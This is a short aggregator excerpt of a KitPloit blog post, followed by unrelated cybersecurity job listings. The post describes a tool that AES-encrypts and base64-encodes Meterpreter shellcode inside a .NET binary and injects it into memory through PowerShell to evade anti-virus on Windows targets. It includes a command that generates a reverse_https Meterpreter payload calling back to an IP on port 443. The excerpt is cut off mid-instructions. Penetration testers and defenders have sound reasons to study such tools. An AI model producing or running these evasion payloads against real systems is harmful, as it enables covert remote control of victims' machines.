Jan. 9, 2022, 8:30 p.m. | noreply@blogger.com (Unknown)

KitPloit - PenTest Tools! www.kitploit.com


A simple shell code encryptor/decryptor/executor to bypass anti virus.

Note: I have completely redone the work flow for creating the bypass, I have found injecting the binary into memory using PowerShell as the most effective method.


Purpose

To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus.

Instructions

Use the meterpreter_encryptor.py to create the encrypted base64 shellcode:

root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.1   68.1.228 -l 443 -f b64
[+] Generating …

anti virus bypass code decryptor msfvenom shell shellcode simple virus windows windows 10

More from www.kitploit.com / KitPloit - PenTest Tools!

SOC 2 Manager, Audit and Certification

@ Deloitte | US and CA Multiple Locations

Security Operations Analyst

@ Astranis | San Francisco

Manager - Business continuity Security and Safety.Risk and Compliance

@ MTN | Benin

Cyber Analyst, Digital Forensics Incident Response

@ At-Bay | Canada

Technical Product Manager, AppSec and DevSecOps

@ Penn Interactive | Philadelphia

Experienced Cloud Security Engineer (m/f/d) - Cybersecurity

@ MediaMarktSaturn | Barcelona, ES, 8003